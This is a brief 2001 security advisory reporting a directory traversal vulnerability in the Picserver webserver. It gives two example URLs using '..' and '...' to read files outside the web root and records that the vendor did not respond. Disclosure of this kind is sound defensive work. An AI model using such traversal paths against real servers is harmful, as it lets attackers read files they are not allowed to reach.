Vulnerability in Picserver Overview Picserver is a specialized webserver available from http://www.informs.com and http://www.zdnet.com. A vulnerability exists which allows a remote user to break out of the web root using relative paths (ie: '..', '...'). Details http://localhost:7000/../[file outside web root] http://localhost:7000/.../[file outside web root] Solution No quick fix is possible. Vendor Status Information Management Specialists, Inc. was contacted via <[EMAIL PROTECTED]> and <[EMAIL PROTECTED]> on Monday, January 29, 2001. No reply was received. - Joe Testa ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron )